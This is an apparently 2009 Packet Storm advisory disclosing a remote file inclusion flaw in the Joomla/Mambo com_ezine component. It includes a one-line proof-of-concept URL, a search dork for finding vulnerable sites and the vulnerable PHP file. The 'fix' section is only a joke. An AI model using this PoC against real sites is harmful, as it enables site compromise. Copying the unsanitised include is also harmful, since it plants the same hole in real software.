Joomla / Mambo Ezine Remote File Inclusion

2009-11-18T00:00:00
ID PACKETSTORM:82757
Type packetstorm
Reporter kaMtiEz
Modified 2009-11-18T00:00:00

Description

                                        
                                            `#####################################################################################################  
## Joomla / Mambo Component com_ezine Remote File Include vulnerability ##  
## Author : kaMtiEz (kamzcrew@yahoo.com) ##  
## Homepage : http://www.indonesiancoder.com ##  
## Date : October 20 2009 ##  
#####################################################################################################  
# Hello My Name Is : ##  
# __ _____ __ ._____________ ##  
# | | _______ / \_/ |_|__\_ _____/_______ ##  
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##  
# | < / __ \_/ Y \ | | || \/ / ##  
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##  
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##  
#####################################################################################################  
  
[ Software Information ]  
  
[+] Vendor : http://designformamb0.c0m   
[+] Download : -  
[+] version : 2.1  
[+] Vulnerability : RFI  
[+] price : FREE   
[+] Dork : inurl:"com_ezine"  
[+] Location : INDONESIA  
  
[DESCRIPTION]  
  
/**  
* eZine component v2.1  
*  
* @copyright Nguyen Manh Cuong  
* Author`s email : cu0ngnm@designformamb0.c0m  
* Author`s hompage : http://designformamb0.c0m  
*  
* @license Commercial Product - Single Site License or Free to Use with Limitation  
**/  
  
###############################################  
  
[ PoC ]  
  
http://127.0.0.1/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]  
  
[ Bugs File ]  
  
[+] d4m_ajax_pagenav.php  
  
<?php  
// Extend mosPageNav class  
require_once( $GLOBALS['mosConfig_absolute_path'] . '/includes/pageNavigation.php' );  
// Define new Page Navigation class  
class ajaxPageNav extends mosPageNav {  
// Rewrite writePagesLinks() function to build ajax friendly URL  
function writeAjaxLinks( $link ) {  
$txt = '';  
  
$displayed_pages = 10;  
$total_pages = ceil( $this->total / $this->limit );  
$this_page = ceil( ($this->limitstart+1) / $this->limit );  
$start_loop = (floor(($this_page-1)/$displayed_pages))*$displayed_pages+1;  
if ($start_loop + $displayed_pages - 1 < $total_pages) {  
$stop_loop = $start_loop + $displayed_pages - 1;  
} else {  
$stop_loop = $total_pages;  
}  
  
if ($this_page > 1) {  
$page = ($this_page - 2) * $this->limit;  
$txt .= '<a href="'. str_replace('%LIMITSTART%', 0, $link) .'" class="pagenav" title="first page"><< '. _PN_START .'</a> ';  
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .'" class="pagenav" title="previous page">< '. _PN_PREVIOUS .'</a> ';  
} else {  
$txt .= '<span class="pagenav"><< '. _PN_START .'</span> ';  
$txt .= '<span class="pagenav">< '. _PN_PREVIOUS .'</span> ';  
}  
  
for ($i=$start_loop; $i <= $stop_loop; $i++) {  
$page = ($i - 1) * $this->limit;  
if ($i == $this_page) {  
$txt .= '<span class="pagenav">'. $i .'</span> ';  
} else {  
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .'" class="pagenav"><strong>'. $i .'</strong></a> ';  
}  
}  
  
if ($this_page < $total_pages) {  
$page = $this_page * $this->limit;  
$end_page = ($total_pages-1) * $this->limit;  
$txt .= '<a href="'. str_replace('%LIMITSTART%', $page, $link) .' " class="pagenav" title="next page">'. _PN_NEXT .' ></a> ';  
$txt .= '<a href="'. str_replace('%LIMITSTART%', $end_page, $link) .' " class="pagenav" title="end page">'. _PN_END .' >></a>';  
} else {  
$txt .= '<span class="pagenav">'. _PN_NEXT .' ></span> ';  
$txt .= '<span class="pagenav">'. _PN_END .' >></span>';  
}  
return $txt;  
}  
}  
?>  
  
[ FIX ]  
  
Tukulesto said : talk to Aurakasih .. lol  
kaMtiEz said : tanya ama AuraKasih .. hha  
M3Nw5 said : takon Karo AuraKasih .. hha  
Arianom Said : coba kau tanya aura kasih lae  
  
Joke.. ;)  
###############################################  
  
[ Thx TO ]  
  
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW  
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h  
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz  
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!  
  
[ NOTE ]   
  
[+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh  
[+] makasih buat om tukulesto buat perl exploit nye .. huahhh  
[+] aurakasih .. sekarang pilih antara kaMtiEz . Tukulesto . M3NW5 ... hha  
[+] om tukulesto kutunggu kau di kotaku .. :D`